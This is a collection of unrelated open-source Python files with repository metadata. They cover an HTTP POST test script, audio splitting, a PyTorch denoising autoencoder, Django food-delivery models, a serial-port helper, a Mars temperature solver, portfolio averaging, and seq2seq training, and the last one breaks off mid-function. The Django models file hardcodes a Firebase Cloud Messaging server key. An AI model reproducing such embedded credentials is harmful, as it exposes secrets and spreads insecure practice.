| engrjabi/WhisperingAssistant | whispering_assistant/window_managers/windows/choice_window.py | choice_window.py | py | 1,535 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "whispering_assistant.window_managers.windows.base_window_template.BaseWindowTemplate",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "PyQt5.QtWidgets.QWidget",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "PyQt5.QtWidgets.QVBoxLayout",
"li... |
43678975341 | # importing the requests library
import requests
import time
# defining the api-endpoint
URL = "http://127.0.0.1:5000/add"
# data to be sent to api
PARAMS = {
'TimeStamp':time.time(),
'Temp1':'24.00',
'Temp2':'24.00',
'TAmbiant':'23.00',
'Humidity':'35'}
# sending post request and saving response as response object
r = requests.post(url = URL, data = PARAMS)
print("The response is %s"%r)
# extracting response text
pastebin_url = r.text
print("The Response Body is:%s"%pastebin_url) | mh49/HSTM | test_tools/post.py | post.py | py | 548 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "time.time",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "requests.post",
"line_number": 16,
"usage_type": "call"
}
] |
323540718 | # -*- coding: utf-8 -*-
"""Console script for mcc."""
import os
import click
from pydub import AudioSegment
from pydub.silence import split_on_silence
@click.command()
@click.argument('sound_path')
@click.option('--mls', default=500, help='沉默的时长,毫秒')
@click.option('--st', default=-30, help='无声的界限,如果比这个数值更小则认为是无声')
@click.option('--name', default=0, help='分割出来文件的名字,默认从0开始')
def main(sound_path, mls, st, name):
"""切割一段带有停顿的空白语音"""
sound = AudioSegment.from_wav(sound_path)
chunks = split_on_silence(sound,
# 沉默的时长, 毫秒
min_silence_len=mls,
# 如果比silence_thresh这个数值更安静则认为是无声
silence_thresh=st
)
print(f'碎片数量: {len(chunks)}')
# 创建文件夹
dirname = f'{name}-{name + len(chunks) - 1}'
if not os.path.exists(dirname):
os.makedirs(dirname)
for i, chunk in enumerate(chunks):
# 导出文件
chunk.export(f'{dirname}/{name + i}.wav', format='wav')
| nanke-ym/mcc | mcc/split.py | split.py | py | 1,227 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pydub.AudioSegment.from_wav",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "pydub.AudioSegment",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "pydub.silence.split_on_silence",
"line_number": 19,
"usage_type": "call"
},
{
"api... |
44395709703 | import torch
import numpy as np
from book.pytorch.utils.helper import get_mnist_loader
import torch.nn.functional as F
from torch import nn
import matplotlib.pyplot as plt
class ConvDenoiser(nn.Module):
def __init__(self, encoding_dim):
super(ConvDenoiser, self).__init__()
# encoder layers
# conv layer (depth from 1 --> 32), 3x3 kernels
self.conv1 = nn.Conv2d(1, 32, 3, padding=1)
# conv layer (depth from 32 --> 16), 3x3 kernels
self.conv2 = nn.Conv2d(32, 16, 3, padding=1)
# conv layer (depth from 16 --> 8), 3x3 kernels
self.conv3 = nn.Conv2d(16, 8, 3, padding=1)
# pooling layer to reduce x-y dims by two; kernel and stride of 2
self.pool = nn.MaxPool2d(2, 2)
# decoder layers
# transpose layer, a kernel of 2 and a stride of 2 will increase the spatial dims by 2
self.t_conv1 = nn.ConvTranspose2d(8, 8, 3, stride=2) # kernel_size=3 to get to a 7x7 image output
# two more transpose layers with a kernel of 2
self.t_conv2 = nn.ConvTranspose2d(8, 16, 2, stride=2)
self.t_conv3 = nn.ConvTranspose2d(16, 32, 2, stride=2)
# one, final, normal conv layer to decrease the depth
self.conv_out = nn.Conv2d(32, 1, 3, padding=1)
def forward(self, x):
# encode
# add hidden layers with relu activation function and maxpooling after
x = F.relu(self.conv1(x))
x = self.pool(x)
# add second hidden layer
x = F.relu(self.conv2(x))
x = self.pool(x)
# add third hidden layer
x = F.relu(self.conv3(x))
x = self.pool(x)
# decode
# add transpose conv layers, with relu activation function
x = F.relu(self.t_conv1(x))
x = F.relu(self.t_conv2(x))
x = F.relu(self.t_conv3(x))
# transpose again, output should have a sigmoid applied
x = torch.sigmoid(self.conv_out(x))
return x
if __name__ == '__main__':
"""
used to denoise images quite successfully just by training the network on noisy images
"""
batch_size = 20
train_loader, test_loader, valid_loader = get_mnist_loader(batch_size=batch_size, is_norm=False)
model = ConvDenoiser(encoding_dim=32)
print(model)
"""comparing pixel values in input and output images, it's best to use a loss that meant for a regression task"""
criterion = nn.MSELoss()
optimizer = torch.optim.Adam(model.parameters(), lr=0.001)
noise_factor = 0.5 # for adding noise to images
n_epochs = 20
for epoch in range(1, n_epochs + 1):
train_loss = 0.0
for data in train_loader:
images, _ = data
# add random noise to the input images
noisy_imgs = images + noise_factor * torch.randn(*images.shape)
# clip the images to be between 0 and 1
noisy_imgs = np.clip(noisy_imgs, 0., 1.)
optimizer.zero_grad()
outputs = model(noisy_imgs)
# the "target" is still the original, not-noisy images
loss = criterion(outputs, images)
loss.backward()
optimizer.step()
train_loss += loss.item() * images.size(0)
# print avg training statistics
train_loss = train_loss / len(train_loader)
print('Epoch: {} \tTraining Loss: {:.6f}'.format(epoch, train_loss))
# check test
dataiter = iter(test_loader)
images, labels = dataiter.next()
# add noise to the test images
noisy_imgs = images + noise_factor * torch.randn(*images.shape)
noisy_imgs = np.clip(noisy_imgs, 0., 1.)
output = model(noisy_imgs)
noisy_imgs = noisy_imgs.numpy() # prep images for display
# output is resized into a batch of images
output = output.view(batch_size, 1, 28, 28)
# use detach when it's an output that requires_grad
output = output.detach().numpy()
# plot the first ten input images and then reconstructed images
fig, axes = plt.subplots(nrows=2, ncols=10, sharex=True, sharey=True, figsize=(25, 4))
# input images on top row, reconstructions on bottom
for noisy_imgs, row in zip([noisy_imgs, output], axes):
for img, ax in zip(noisy_imgs, row):
ax.imshow(np.squeeze(img), cmap='gray')
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
plt.show()
| jk983294/morph | book/pytorch/autoencoder/cnn_denoise.py | cnn_denoise.py | py | 4,398 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "torch.nn.Conv2d",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_numb... |
718069407 |
from django.db import models
from django.contrib.auth.models import User
from django.db.models.query import ModelIterable
from django.db.models.signals import post_save, post_init
import requests
import random
def sendNotification(usertoken, title, body):
userdata = {
"to": str(usertoken),
"notification": {
"body": str(title),
"title": str(body),
"content_available": True,
"priority": "high"
}
}
headers = {
"Authorization": "key=AAAAwVFO9Fw:APA91bHymQMWRKlGHZOVMxp4_-0HA5vOlybPEpCU7NHOs1v9lkkd5JrtYzsU_3UYH5-nxcSZYA9xUOVYfpyKPE_YFdL2BgCKUvbIBBNuqfvIAOcbjLZ6eQ7o4SCAFG1UGBp8X7JnB2HI",
"Content-Type": "application/json"
}
r = requests.post(
'https://fcm.googleapis.com/fcm/send', json=userdata, headers=headers)
class CustomerProfile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, blank=True)
# aadharNo = models.IntegerField(default=0)
phoneNo = models.CharField(max_length=10, blank=True)
def __str__(self):
return "%s's profile" % self.user
class DeliveryProfile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, blank=True)
# aadharNo = models.IntegerField(default=0)
phoneNo = models.CharField(max_length=10, blank=True)
def __str__(self):
return "%s's profile" % self.user
class ShopLocality(models.Model):
name = models.CharField(max_length=500)
def __str__(self):
return self.name
class Shop(models.Model):
vendor = models.ForeignKey(
User, on_delete=models.CASCADE, blank=True, null=True)
name = models.CharField(max_length=500)
currentOffer = models.FloatField()
ShopImg = models.CharField(max_length=500, blank=True,
default="https://images.unsplash.com/photo-1498837167922-ddd27525d352?ixid=MXwxMjA3fDB8MHxwaG90by1wYWdlfHx8fGVufDB8fHw%3D&ixlib=rb-1.2.1&auto=format&fit=crop&w=1050&q=80.jpg")
locality = models.ForeignKey(
ShopLocality, on_delete=models.CASCADE, null=True)
latitude = models.FloatField(null=True)
longitude = models.FloatField(null=True)
addressinwords = models.CharField(
max_length=1000, default="")
phoneNo = models.CharField(max_length=10, blank=True)
email = models.CharField(max_length=10, blank=True)
date = models.DateField(auto_now_add=True, null=True)
time = models.TimeField(auto_now_add=True, null=True)
def __str__(self):
return self.name
class ProductCategory(models.Model):
name = models.CharField(max_length=500)
def __str__(self):
return self.name
class Product(models.Model):
name = models.CharField(max_length=500)
price = models.FloatField()
shop = models.ForeignKey(Shop, on_delete=models.CASCADE, null=True)
category = models.ForeignKey(
ProductCategory, on_delete=models.CASCADE, null=True)
productImage = models.CharField(
max_length=500, default="https://images.unsplash.com/photo-1458642849426-cfb724f15ef7?ixid=MXwxMjA3fDB8MHxwaG90by1wYWdlfHx8fGVufDB8fHw%3D&ixlib=rb-1.2.1&auto=format&fit=crop&w=1050&q=80")
def __str__(self):
return self.name
class PaymentCategory(models.Model):
name = models.CharField(max_length=500)
def __str__(self):
return self.name
class CustomerOrder(models.Model):
orderFor = models.ForeignKey(
User, on_delete=models.CASCADE, blank=True)
product = models.ManyToManyField(
Product, blank=True)
shop = models.ForeignKey(Shop, on_delete=models.CASCADE, null=True)
latitude = models.FloatField(null=True)
longitude = models.FloatField(null=True)
date = models.DateField(auto_now_add=True, null=True)
time = models.TimeField(auto_now_add=True, null=True)
orderImg = models.CharField(
max_length=500, null=True, default="https://images.unsplash.com/photo-1498837167922-ddd27525d352?ixid=MXwxMjA3fDB8MHxwaG90by1wYWdlfHx8fGVufDB8fHw%3D&ixlib=rb-1.2.1&auto=format&fit=crop&w=1050&q=80.jpg")
status = models.CharField(max_length=1000, null=True)
orderPrice = models.FloatField(default=100)
deliveryboy = models.ForeignKey(
DeliveryProfile, on_delete=models.CASCADE, null=True, blank=True)
locality = models.ForeignKey(
ShopLocality, on_delete=models.CASCADE, null=True, blank=True)
addressinwords = models.CharField(
max_length=1000, default="")
typeOfPayment = models.ForeignKey(
PaymentCategory, on_delete=models.CASCADE, null=True)
OTP = models.IntegerField(null=True, default=0)
payment_status = models.CharField(
max_length=100, null=True, blank=True)
@staticmethod
def post_save(sender, **kwargs):
instance = kwargs.get('instance')
if instance.previous_status != instance.status or instance.OTP == 0:
print("status changed")
try:
try:
user = FireabaseToken.objects.filter(
user=instance.orderFor).first()
usertoken = user.token
vendor = FireabaseToken.objects.filter(
user=instance.shop.vendor).first()
vendortoken = vendor.token
except:
pass
status = instance.status
if instance.OTP == 0:
instance.OTP = random.randint(1000, 9999)
instance.save()
sendNotification(vendortoken, 'New Order',
"A new order has been placed")
sendNotification(usertoken, 'Order Placed',
"Order has been placed awaiting for the restaurant response")
elif status == "shopreject":
sendNotification(
usertoken, 'Order Staus', "Your order has been denied")
elif status == "pending":
sendNotification(usertoken, 'Order Status',
"Your order is beign prepared")
elif status == "inorder":
sendNotification(usertoken, 'Order Staus',
"Your order is on the way")
elif status == "delivered":
sendNotification(usertoken, 'Order Status',
"You have recived your order")
except:
pass
@staticmethod
def remember_status(sender, **kwargs):
instance = kwargs.get('instance')
instance.previous_status = instance.status
post_save.connect(CustomerOrder.post_save, sender=CustomerOrder)
post_init.connect(CustomerOrder.remember_status, sender=CustomerOrder)
class ProductQuanities(models.Model):
product = models.ForeignKey(
Product, on_delete=models.CASCADE, blank=True)
quantity = models.IntegerField()
orderID = models.ForeignKey(
CustomerOrder, on_delete=models.CASCADE, blank=True, null=True)
class FireabaseToken(models.Model):
token = models.CharField(max_length=500)
user = models.OneToOneField(
User, on_delete=models.CASCADE, blank=True, null=True)
def __str__(self):
return self.token
class StoreImage(models.Model):
image = models.ImageField()
def __str__(self):
return self.image.url
| haydencordeiro/FoodDeliveryDjango | food/models.py | models.py | py | 7,454 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "requests.post",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "django.db.models.Model",
"line_number": 30,
"usage_type": "attribute"
},
{
"api_name": "django.db.models",
"line_number": 30,
"usage_type": "name"
},
{
"api_name": "django.db.... |
10556749786 | import serial
import tkinter
from tkinter import*
TTY_DEVICE = "COM"
s=serial.Serial()
def init(port,text2):
global s
try:
s=serial.Serial(TTY_DEVICE + str(port), 115200, timeout=10)
print('connect com'+str(port))
text2.configure(state=tkinter.NORMAL)
text2.insert(1.0,'connect COM'+str(port)+"\n")
text2.configure(state=tkinter.DISABLED)
except (OSError, serial.SerialException):
pass
def disconnect(text2):
global s
text2.configure(state=tkinter.NORMAL)
text2.insert(1.0,'COM-port Disconnect'+"\n")
text2.configure(state=tkinter.DISABLED)
s.close();
print('COM-port Disconnect')
def write(text):
global s
try:
s.write(text)
except serial.SerialException:
print('com port disconnect')
def read():
global s
try:
text=str(s.read(s.inWaiting()));
return text
except serial.SerialException:
print('com port disconnect')
def findCom():
global s
s.close()
print('com close')
comAvable=[]
for i in range(0,50):
try:
s = serial.Serial(TTY_DEVICE + str(i), 115200, timeout=10)
comAvable.append(i)
s.close()
print('Serial close')
except (OSError, serial.SerialException):
pass
else:
return comAvable | Zealua/PythonFirstTest | GUI/GUI_VGH/driver/comPort.py | comPort.py | py | 1,363 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "serial.Serial",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "serial.Serial",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "tkinter.NORMAL",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "tkinter.DISABLED",
... |
72053024743 | import numpy as np
from scipy.optimize import fsolve
import matplotlib.pyplot as plt
from mars import Mars
emissivity_dessert = 0.5
emissivity_PV = 0.5
absorptivity_dessert = 0.5
absorptivity_PV = 0.5
delta_time = 24 * 60 * 60
f = 0.15
cp = 1
T_Atmosphere = 200
rho = 1
num_days = 700
# formula not given. Just a placeholder. replace values in mars.py
x = 1e-5
Mars = Mars(absorptivity_PV, absorptivity_dessert, emissivity_dessert, emissivity_PV, delta_time, f,
cp, T_Atmosphere, rho, x)
# Just any simulated values. Replace by real ones. Numpy vector and each entry is average of the given day
L_in = np.cos(np.linspace(0, 2 * np.pi, num_days)) * 5 + 5
S_in = np.cos(np.linspace(0, 2 * np.pi, num_days)) * 5 + 5
r_H_dessert = np.ones(shape=num_days)
r_H_PV = r_H_dessert / 2
Temperature_init = np.ones(shape=(2 * num_days,)) * 273
root = fsolve(lambda Temperature: Mars.system(Temperature, num_days=num_days, l_in=L_in, s_in=S_in,
r_H_PV=r_H_PV, r_H_dessert=r_H_dessert),
Temperature_init)
plt.figure()
plt.plot(np.arange(0, num_days), root[0:num_days])
plt.plot(np.arange(0, num_days), root[num_days:2 * num_days])
plt.show()
| muedavid/Mars | main.py | main.py | py | 1,207 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "mars.Mars",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "numpy.cos",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "numpy.linspace",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "numpy.pi",
"line_number": 25,
... |
37779455706 | import json
from datetime import datetime as dt
from datetime import date as dto
import copy
class ProcessJsonPortfolio:
def calculate_average_price(self, _dict):
"""Calculate dollar cost average per security.
Args:
_dict (:obj:`dict`): Portfolio loaded from json.
Return:
(:obj:`tuple` of :obj:`dict`, :obj:`list`, :obj:`list`): new portfolio object; list of securities; list of holdings
"""
securities = []
holdings = []
result = copy.deepcopy(_dict)
for key in _dict:
if key == 'test':
continue
total_count = 0
total_cost = 0
for i, val in enumerate(_dict[key]['Lots']): #{'date': ... 'shares': ... 'executed price'}
total_count += val['Shares']
total_cost += val['Executed Price'] * val['Shares']
result[key]['Lots'][i]['Processed'] = "True"
avg_cost = total_cost / total_count
result[key]['Total Holdings'] = total_count
result[key]['Total Cost'] = total_cost
result[key]['Average Cost'] = avg_cost
securities.append(key)
holdings.append(total_count)
return result, securities, holdings
def get_earliest_date(self, _dict):
"""Get the earliest unprocessed date.
Args:
_dict (:obj:`dict`): portfolio object.
"""
earliest_date = dto.today()
for key in _dict:
if key == 'test':
continue
for val in _dict[key]['Lots']:
if val.get('Processed') == "True":
continue
else:
cur_date = dt.strptime(val['Date'], '%Y-%m-%d').date()
if cur_date < earliest_date:
earliest_date = cur_date
return earliest_date
| lzy7071/portfolio_tools | portfolio_tools/util/process_json_portfolio.py | process_json_portfolio.py | py | 1,929 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "copy.deepcopy",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "datetime.date.today",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "datetime.date",
"line_number": 44,
"usage_type": "name"
},
{
"api_name": "datetime.datetime.str... |
31279947642 | from ray import serve
from typing import List, Dict
import json
import numpy as np
from scipy.optimize import linprog
@serve.deployment(num_replicas=1, ray_actor_options={"num_cpus": 1, "num_gpus": 0})
class LinearProgrammingService(object):
# def __init__(self):
def LinearProgramming(self, body: Dict):
print(123)
try:
event = body
MinOrMax = event['MinOrMax']
target = event['target']
A = event['A']
b = event['b']
bounds = event['bounds']
print("线性规划求解器:")
if MinOrMax == 'min':
pass
elif MinOrMax == 'max':
target = np.array(target) * (-1)
# minimize
res = linprog(target, A, b, bounds=bounds)
except Exception as e:
print(e)
print(e.__traceback__.tb_frame.f_globals["__file__"]) # 发生异常所在的文件
print(e.__traceback__.tb_lineno) # 发生异常所在的行数
else:
print("success")
return {
"OptimalValue": res.fun,
"OptimalSolution": res.x
}
| tju-hwh/Yet-Another-Serverless-Benchmark | solver/ray_stateful/so/service/linear_programming.py | linear_programming.py | py | 1,180 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.Dict",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "numpy.array",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "scipy.optimize.linprog",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "ray.serve.deployment",... |
40761385267 | import os
import sys
FILE_DIR = os.path.dirname(os.path.abspath(__file__))
# PROJ_DIR = FILE_DIR[:FILE_DIR.index('src')]
# sys.path.append(PROJ_DIR)
PROJ_DIR = os.path.abspath("..")
print(f"proj_dir is: {PROJ_DIR}, adding to sys.path")
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import pytorch_lightning as pl
from pytorch_lightning.callbacks import EarlyStopping, ModelCheckpoint
from pytorch_lightning.loggers import TensorBoardLogger
from torchmetrics.functional import bleu_score
from transformers import get_linear_schedule_with_warmup
from q_snippets.data import load_json, save_json
from data_utils import Seq2seqDataModule
from model import get_model_by_name
class Seq2seqGeneration(pl.LightningModule):
def __init__(self, config, model) :
super().__init__()
self.config = config
self.model = model
self.save_hyperparameters(ignore='model') # ignore model to avoid assigning model to Omegaconf when load_from_ckpt
self.val_pred_ids = []
self.val_target_ids = []
self.gold_corpus = []
self.pred_corpus = []
def forward(self, batch):
def _custom_forward(batch):
""" for BART """
if batch.target_ids is not None:
target_ids = batch.target_ids[:, :-1].contiguous()
lm_labels = batch.target_ids[:, 1:].clone()
lm_labels[batch.target_ids[:, 1:] == self.model.config.pad_token_id] = -100
else:
target_ids, lm_labels = None, None
# print(batch.input_ids.size(), target_ids.size(), lm_labels.size())
output = self.model(
input_ids=batch.input_ids, attention_mask=batch.attention_mask,
decoder_input_ids=target_ids,
labels=lm_labels,
# output_attentions=True # for copy mechanism
)
return output
def _default_forward(batch):
""" 训练时模型会自动从labels参数右移得到decoder_input_ids
for T5
"""
return self.model(batch.input_ids, attention_mask=batch.attention_mask, labels=batch.target_ids)
return _default_forward(batch)
# return _custom_forward(batch)
def training_step(self, batch, batch_idx):
output = self(batch)
self.log('train_loss', output.loss, prog_bar=True, sync_dist=True)
return output.loss
def validation_step(self, batch, batch_idx) :
output = self(batch)
# self.val_pred_ids.extend(output.logits.argmax(-1).cpu().numpy().tolist())
self.log('val_loss', output.loss, prog_bar=True, sync_dist=True) #log the val_loss
pred_ids = self.model.generate(
input_ids=batch.input_ids, max_length=500, use_cache=True,
num_beams=1, do_sample=False # greedy search is the fastest
)
self.val_pred_ids.extend(pred_ids)
# save gold ids for bleu computing
if self.gold_corpus == [] and batch.target_ids is not None:
self.val_target_ids.extend(batch.target_ids.cpu().numpy().tolist())
def _save_val_result(self):
self.gold_corpus = ["None" for _ in self.pred_corpus ] if self.gold_corpus == [] else self.gold_corpus
R = []
for p, sample, g in zip(self.pred_corpus, self.trainer.datamodule.valset.samples, self.gold_corpus):
R.append(dict(
**sample.__dict__,
**{
'expected': g,
'generated':p}
))
# logdir = trainer.logger.log_dir if hasattr(trainer.logger, 'log_dir') else trainer.logger.save_dir
logdir = self.trainer.logger.log_dir
filename = os.path.join(logdir, f"val_epoch{self.current_epoch:02}.json")
save_json(R, filename)
def validation_epoch_end(self, outputs):
tokenizer = self.trainer.datamodule.tokenizer
self.pred_corpus = tokenizer.batch_decode(self.val_pred_ids, skip_special_tokens = True, clean_up_tokenization_spaces = True)
if self.gold_corpus == [] and self.val_target_ids != [] :
self.gold_corpus = tokenizer.batch_decode(self.val_target_ids, skip_special_tokens = True, clean_up_tokenization_spaces = True)
print(len(self.pred_corpus), len(self.gold_corpus))
bleu = bleu_score(self.pred_corpus, [ [_] for _ in self.gold_corpus])
self.log('val_bleu', bleu, prog_bar=True, sync_dist=True)
self._save_val_result()
self.val_pred_ids, self.val_target_ids =[], []
def _get_grouped_params(self):
no_decay = ["bias", "LayerNorm.weight"]
# Group parameters to those that will and will not have weight decay applied
optimizer_grouped_parameters = [
{
"params": [p for n, p in self.model.named_parameters() if not any(nd in n for nd in no_decay)],
"weight_decay": 0.01,
},
{
"params": [p for n, p in self.model.named_parameters() if any(nd in n for nd in no_decay)],
"weight_decay": 0.0,
},
]
return optimizer_grouped_parameters
def configure_optimizers(self):
optimizer = optim.AdamW(self._get_grouped_params(), lr=self.config.lr)
# return optimizer
total_steps = int(len(self.trainer.datamodule.train_dataloader()) // self.config.accumulate_grads ) * self.config.max_epochs # accumulate_grads
warmup_step = int(total_steps * self.config.warmup_rate)
# lr_scheduler = get_cosine_schedule_with_warmup(optimizer, num_warmup_steps=warmup_step, num_training_steps=steps_per_epoch*self.config.max_epochs)
lr_scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=warmup_step, num_training_steps=total_steps)
return [optimizer], [{'scheduler': lr_scheduler, 'interval': 'step', 'frequency': 1, 'strict': True, 'monitor': None}]
def predict_step(self, batch , batch_idx) :
batch_pred_ids = self.model.generate(
input_ids=batch.input_ids, max_length=500, use_cache=True)
return batch_pred_ids.cpu().numpy().tolist()
def on_predict_epoch_end(self, results) -> None:
""" results = [[ batch_result ]]
batch_result = [[],[],...]
聚合每个predict_step的结果,解码并保存到文件
"""
all_pred_ids = sum(results[0], [])
preds = self.trainer.datamodule.tokenizer.batch_decode(all_pred_ids, skip_special_tokens = True, clean_up_tokenization_spaces = True)
R = []
for sample, p in zip(self.trainer.datamodule.testset.samples, preds):
R.append(dict(
**sample.__dict__,
**{
'generated':p}
))
save_json(R, self.config.preds.result_path)
return preds
def train_model(config):
_model = get_model_by_name(config)
model = Seq2seqGeneration(config, _model) # 创建Lightning框架
dm = Seq2seqDataModule(config=config)
logger = TensorBoardLogger(
save_dir="./lightning_logs/",
name=None, # 指定experiment, ./lightning_logs/exp_name/version_name
version=config.version, # 指定version, ./lightning_logs/version_name
)
# 设置保存模型的路径及参数
CUR_DIR = os.getcwd()
dirname = os.path.join(CUR_DIR, "./lightning_logs/", config.version)
ckpt_callback = ModelCheckpoint(
dirpath=dirname,
filename="{epoch}_{train_loss:.4f}_{val_bleu:.4f}", # 模型保存名称, epoch信息以及验证集分数
monitor='val_bleu',
mode='max',
save_top_k=3,
verbose=True,
)
es = EarlyStopping('train_loss', patience=10, mode='min')
trainer = pl.Trainer(
accumulate_grad_batches=config.accumulate_grads,
logger=logger,
num_sanity_val_steps=0, # 如果使用sanity_check 会导致val时self.gold_corpus数量出现问题
# limit_train_batches=64, # 限制训练集数量,方便快速调试
# limit_val_batches=64, # 一般直接用全量测试数据吧, 验证函数可能会报错
max_epochs=config.max_epochs,
callbacks=[ckpt_callback, es],
accelerator="gpu",
devices=1,
# resume_from_checkpoint="/home/qing/repos/demo/conditional_generation/lightning_logs/2rd/epoch=1_train_loss=2.0390_val_bleu=0.0197.ckpt"
)
# dm.setup(stage='fit')
trainer.fit(model, dm)
def predict_ckpt(config):
dm = Seq2seqDataModule(config)
dm.setup(stage='test')
_model = get_model_by_name(config)
model = Seq2seqGeneration.load_from_checkpoint(config.preds.ckpt_path, config=config, model=_model)
trainer = pl.Trainer(accelerator="gpu", devices=1)
x = trainer.predict(model, dm) # 预测结果已经在on_predict_epoch_end中保存了
print(type(x))
def raw_generate(config):
from tqdm import tqdm
device = 'cuda' if torch.cuda.is_available() else 'cpu'
dm = Seq2seqDataModule(config)
dm.setup(stage='test')
_model = get_model_by_name(config)
model = Seq2seqGeneration.load_from_checkpoint(config.preds.ckpt_path, config=config, model=_model).to(device)
with torch.no_grad():
R = []
for i, batch in enumerate(tqdm(dm.test_dataloader())):
batch = batch.to(device)
pred_ids = model.model.generate(input_ids=batch.input_ids, max_length=500, use_cache=True, num_beams=1, do_sample=False)
R.extend(pred_ids.cpu().numpy().tolist())
x = dm.tokenizer.batch_decode(R)
| Qing25/demo | conditional_generation/frame.py | frame.py | py | 9,872 | python | en | code | 8 | github-code | 36 | [
{
"api_name": "os.path.dirname",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "os.path.abspath",
"line... |
5460426589 | from functools import partial
from ._derived import Derived
from . import utilities
class Operation(Derived):
__slots__ = ('opkwargs', 'opfn')
def __init__(self,
*terms,
op = None,
**kwargs,
):
if type(op) is tuple:
sops, op = op[:-1], op[-1]
for sop in sops:
terms = Operation(*terms, op = sop)
if not type(terms) is tuple:
terms = terms,
self.opfn = partial(op, **kwargs)
self.opfn.__name__ = op.__name__
self.opkwargs = kwargs
super().__init__(*terms, op = op, **kwargs)
def evaluate(self):
return self.opfn(*self._resolve_terms())
def _titlestr(self):
return self.opfn.__name__
def _kwargstr(self):
kwargs = self.kwargs.copy()
del kwargs['op']
if kwargs:
return utilities.kwargstr(**kwargs)
else:
return ''
| lmoresi/funcy | funcy/_operation.py | _operation.py | py | 972 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "_derived.Derived",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "functools.partial",
"line_number": 20,
"usage_type": "call"
}
] |
15826790722 | # Standard imports
import copy
import pandas as pd
import logging
import jsonpickle as jpickle
import sklearn.cluster as sc
# Our imports
import emission.storage.timeseries.abstract_timeseries as esta
import emission.analysis.modelling.tour_model.get_scores as gs
import emission.analysis.modelling.tour_model.get_users as gu
import emission.analysis.modelling.tour_model.label_processing as lp
import emission.analysis.modelling.tour_model.evaluation_pipeline as ep
import emission.analysis.modelling.tour_model.load_predict as load
import emission.analysis.modelling.tour_model.data_preprocessing as preprocess
def find_best_split_and_parameters(user,test_data):
# find the best score
filename = "user_"+str(user)+".csv"
df = pd.read_csv(filename, index_col='split')
scores = df['scores'].tolist()
best_split_idx = scores.index(max(scores))
# use the position of best_score to find best_split
best_split = test_data[best_split_idx]
# use best_split_idx to find the best parameters
low = df.loc[best_split_idx, 'lower boundary']
dist_pct = df.loc[best_split_idx, 'distance percentage']
return best_split,best_split_idx,low,dist_pct
# def find_best_parameters(user,best_split_idx):
# tradeoff_filename = 'tradeoff_' + str(user)
# tradeoff_1user = load.loadModelStage(tradeoff_filename)
# best_parameters = tradeoff_1user[best_split_idx]
# return best_parameters
def save_models(obj_name,obj,user):
obj_capsule = jpickle.dumps(obj)
filename = obj_name + '_' + str(user)
with open(filename, "w") as fd:
fd.write(obj_capsule)
def main():
all_users = esta.TimeSeries.get_uuid_list()
radius = 100
for a in range(len(all_users)):
user = all_users[a]
trips = preprocess.read_data(user)
filter_trips = preprocess.filter_data(trips, radius)
# filter out users that don't have enough valid labeled trips
if not gu.valid_user(filter_trips, trips):
logging.debug("This user doesn't have enough valid trips for further analysis.")
continue
tune_idx, test_idx = preprocess.split_data(filter_trips)
test_data = preprocess.get_subdata(filter_trips, tune_idx)
# find the best split and parameters, and use them to build the model
best_split, best_split_idx, low, dist_pct = find_best_split_and_parameters(user,test_data)
# run the first round of clustering
sim, bins, bin_trips, filter_trips = ep.first_round(best_split, radius)
# It is possible that the user doesn't have common trips. Here we only build models for user that has common trips.
if len(bins) is not 0:
gs.compare_trip_orders(bins, bin_trips, filter_trips)
first_labels = ep.get_first_label(bins)
first_label_set = list(set(first_labels))
# second round of clustering
model_coll = {}
bin_loc_feat = {}
fitst_round_labels = {}
for fl in first_label_set:
# store second round trips data
second_round_trips = []
for index, first_label in enumerate(first_labels):
if first_label == fl:
second_round_trips.append(bin_trips[index])
x = preprocess.extract_features(second_round_trips)
# collect location features of the bin from the first round of clustering
# feat[0:4] are start/end coordinates
bin_loc_feat[str(fl)] = [feat[0:4] for feat in x]
# here we pass in features(x) from selected second round trips to build the model
method = 'single'
clusters = lp.get_second_labels(x, method, low, dist_pct)
n_clusters = len(set(clusters))
# build the model
kmeans = sc.KMeans(n_clusters=n_clusters, random_state=0).fit(x)
# collect all models, the key is the label from the 1st found
# e.g.{'0': KMeans(n_clusters=2, random_state=0)}
model_coll[str(fl)] = kmeans
# get labels from the 2nd round of clustering
second_labels = kmeans.labels_
first_label_obj = []
# save user labels for every cluster
second_label_set = list(set(second_labels))
sec_round_labels = {}
for sl in second_label_set:
sec_sel_trips = []
sec_label_obj = []
for idx, second_label in enumerate(second_labels):
if second_label == sl:
